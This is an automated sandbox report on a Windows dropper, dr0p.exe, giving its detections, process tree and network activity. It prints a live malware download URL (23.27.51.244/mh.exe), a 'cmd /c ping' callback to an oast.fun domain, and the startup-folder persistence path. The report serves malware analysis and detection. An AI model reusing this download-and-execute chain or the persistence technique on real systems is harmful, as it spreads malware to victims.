Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dr0p.exe

Overview

General Information

Sample name:dr0p.exe
Analysis ID:1584651
MD5:d085f244d635d6e43546e63649ea2e67
SHA1:52dcf3734c43becb6d66e399186b760da511c19a
SHA256:d40b523a10b6a72a37b9ee419f6a1d38403d1a8676ceddb3186ec85289ad1f29
Tags:exeuser-zhuzhu0009
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Drops PE files to the startup folder
Found API chain with Download & Execute functionality
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
File is packed with WinRar
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • dr0p.exe (PID: 5412 cmdline: "C:\Users\user\Desktop\dr0p.exe" MD5: D085F244D635D6E43546E63649EA2E67)
    • mh.exe (PID: 1176 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe" MD5: 287EEBE03B7EC7488ED2AE07A5E98CF0)
      • q.exe (PID: 1596 cmdline: "C:\Users\user\Desktop\q.exe" hm.exe MD5: 935809D393A2BF9F0E886A41FF5B98BE)
        • conhost.exe (PID: 6904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • hm.exe (PID: 5788 cmdline: "C:\Users\user\Desktop\hm.exe" MD5: 692D72923747BE1ED2C05CD6B4118BF4)
          • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1616 cmdline: "C:\Windows\System32\cmd.exe" /c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 5976 cmdline: ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup
No configs have been found
No yara matches
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\dr0p.exe, ProcessId: 5412, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-06T06:03:58.177534+010020197142Potentially Bad Traffic192.168.2.64970923.27.51.24480TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-06T06:03:58.177534+010028032702Potentially Bad Traffic192.168.2.64970923.27.51.24480TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeReversingLabs: Detection: 43%
Source: C:\Users\user\Desktop\hm.exeReversingLabs: Detection: 29%
Source: dr0p.exeVirustotal: Detection: 18%Perma Link
Source: dr0p.exeReversingLabs: Detection: 23%
Source: dr0p.exeJoe Sandbox ML: detected
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: mh.exe, 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmp, mh.exe, 00000003.00000000.2155289932.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmp, mh.exe.0.dr
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EBB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF741EBB190
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EA40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF741EA40BC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741ECFCA0 FindFirstFileExA,3_2_00007FF741ECFCA0
Source: C:\Users\user\Desktop\dr0p.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exeFile opened: C:\Users\user\AppData\Jump to behavior

Networking

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun
Source: global trafficTCP traffic: 192.168.2.6:60428 -> 162.159.36.2:53
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 Jan 2025 05:03:58 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 06 Jan 2025 04:27:52 GMTETag: "1d3dc2-62b020d388200"Accept-Ranges: bytesContent-Length: 1916354Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 24 84 32 e2 60 e5 5c b1 60 e5 5c b1 60 e5 5c b1 d4 79 ad b1 68 e5 5c b1 d4 79 af b1 eb e5 5c b1 d4 79 ae b1 6d e5 5c b1 e0 9e a1 b1 62 e5 5c b1 e0 9e 58 b0 72 e5 5c b1 e0 9e 5f b0 6a e5 5c b1 e0 9e 59 b0 59 e5 5c b1 69 9d df b1 69 e5 5c b1 69 9d db b1 62 e5 5c b1 69 9d cf b1 67 e5 5c b1 60 e5 5d b1 43 e4 5c b1 ee 9e 59 b0 52 e5 5c b1 ee 9e 5c b0 61 e5 5c b1 ee 9e a3 b1 61 e5 5c b1 ee 9e 5e b0 61 e5 5c b1 52 69 63 68 60 e5 5c b1 00 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 23 97 40 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 21 00 68 04 00 00 38 03 00 00 00 00 00 e0 2e 03 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 08 00 00 04 00 00 00 00 00 00 02 00 60 c1 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 97 05 00 34 00 00 00 d4 97 05 00 50 00 00 00 00 00 07 00 60 e3 00 00 00 a0 06 00 6c 30 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 70 09 00 00 c0 36 05 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 37 05 00 28 00 00 00 f0 b3 04 00 40 01 00 00 00 00 00 00 00 00 00 00 00 80 04 00 08 05 00 00 bc 88 05 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6e 67 04 00 00 10 00 00 00 68 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 28 01 00 00 80 04 00 00 2a 01 00 00 6c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c e7 00 00 00 b0 05 00 00 1a 00 00 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 6c 30 00 00 00 a0 06 00 00 32 00 00 00 b0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 60 03 00 00 00 e0 06 00 00 04 00 00 00 e2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 5f 52 44 41 54 41 00 00 5c 01 00 00 00 f0 06 00 00 02 00 00 00 e6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 60 e3 00 00 00 00 07 00 00 e4 00 00 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 70 09 00 00 00 f0 07 00 00 0a 00 00 00 cc 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49709 -> 23.27.51.244:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49709 -> 23.27.51.244:80
Source: global trafficHTTP traffic detected: GET /mh.exe HTTP/1.1User-Agent: Mozilla/5.0Host: 23.27.51.244Cache-Control: no-cache
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknownTCP traffic detected without corresponding DNS query: 23.27.51.244
Source: C:\Users\user\Desktop\dr0p.exeCode function: 0_2_0042006A InternetOpenA,InternetOpenUrlA,SHGetFolderPathA,lstrcat,lstrcat,lstrcat,CreateFileA,InternetReadFile,WriteFile,CloseHandle,CloseHandle,CloseHandle,CloseHandle,ShellExecuteA,ShellExecuteA,ShellExecuteA,exit,0_2_0042006A
Source: global trafficHTTP traffic detected: GET /mh.exe HTTP/1.1User-Agent: Mozilla/5.0Host: 23.27.51.244Cache-Control: no-cache
Source: dr0p.exe, dr0p.exe, 00000000.00000002.2157971429.0000000000420000.00000040.00000001.01000000.00000003.sdmp, dr0p.exe, 00000000.00000002.2162499969.0000000005855000.00000004.00000020.00020000.00000000.sdmp, dr0p.exe, 00000000.00000003.2154650025.0000000005855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.27.51.244/mh.exe
Source: dr0p.exe, 00000000.00000002.2157971429.0000000000420000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://23.27.51.244/mh.exe/c
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741E9C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF741E9C2F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EBB1903_2_00007FF741EBB190
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EAA4AC3_2_00007FF741EAA4AC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EB34843_2_00007FF741EB3484
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EC07543_2_00007FF741EC0754
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741E9F9303_2_00007FF741E9F930
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EA49283_2_00007FF741EA4928
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EBCE883_2_00007FF741EBCE88
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741E95E243_2_00007FF741E95E24
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EB1F203_2_00007FF741EB1F20
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741E9A3103_2_00007FF741E9A310
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741E9C2F03_2_00007FF741E9C2F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741E972883_2_00007FF741E97288
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EA126C3_2_00007FF741EA126C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EB21D03_2_00007FF741EB21D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EAF1803_2_00007FF741EAF180
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EB53F03_2_00007FF741EB53F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741E976C03_2_00007FF741E976C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741ED25503_2_00007FF741ED2550
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EAB5343_2_00007FF741EAB534
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741E948403_2_00007FF741E94840
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741ECC8383_2_00007FF741ECC838
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741ED5AF83_2_00007FF741ED5AF8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EB2AB03_2_00007FF741EB2AB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741E91AA43_2_00007FF741E91AA4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741ECFA943_2_00007FF741ECFA94
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EA1A483_2_00007FF741EA1A48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EC89A03_2_00007FF741EC89A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EAC96C3_2_00007FF741EAC96C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EB39643_2_00007FF741EB3964
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EC8C1C3_2_00007FF741EC8C1C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EB4B983_2_00007FF741EB4B98
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EABB903_2_00007FF741EABB90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EA5B603_2_00007FF741EA5B60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EC07543_2_00007FF741EC0754
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EB8DF43_2_00007FF741EB8DF4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EB2D583_2_00007FF741EB2D58
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741ED20803_2_00007FF741ED2080
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EAAF183_2_00007FF741EAAF18
Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\hm.exe C035C371F1AD9A96B51F28FBE9E6F7A402BF10CD1CA2D82AABBC78BA07C7703F
Source: hm.exe.3.drStatic PE information: Number of sections : 11 > 10
Source: dr0p.exeStatic PE information: No import functions for PE file found
Source: dr0p.exe, 00000000.00000002.2162499969.00000000058A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs dr0p.exe
Source: classification engineClassification label: mal72.troj.adwa.winEXE@14/6@0/1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741E9B6D8 GetLastError,FormatMessageW,LocalFree,3_2_00007FF741E9B6D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EB82C4 CoCreateInstance,3_2_00007FF741EB82C4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EB8624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,3_2_00007FF741EB8624
Source: C:\Users\user\Desktop\dr0p.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3472:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6904:120:WilError_03
Source: C:\Users\user\Desktop\dr0p.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: dr0p.exeVirustotal: Detection: 18%
Source: dr0p.exeReversingLabs: Detection: 23%
Source: unknownProcess created: C:\Users\user\Desktop\dr0p.exe "C:\Users\user\Desktop\dr0p.exe"
Source: C:\Users\user\Desktop\dr0p.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe"
Source: C:\Users\user\Desktop\dr0p.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeProcess created: C:\Users\user\Desktop\q.exe "C:\Users\user\Desktop\q.exe" hm.exe
Source: C:\Users\user\Desktop\q.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\q.exeProcess created: C:\Users\user\Desktop\hm.exe "C:\Users\user\Desktop\hm.exe"
Source: C:\Users\user\Desktop\hm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\dr0p.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe" Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.funJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeProcess created: C:\Users\user\Desktop\q.exe "C:\Users\user\Desktop\q.exe" hm.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.funJump to behavior
Source: C:\Users\user\Desktop\q.exeProcess created: C:\Users\user\Desktop\hm.exe "C:\Users\user\Desktop\hm.exe" Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: windows.staterepositoryps.dllJump to behavior
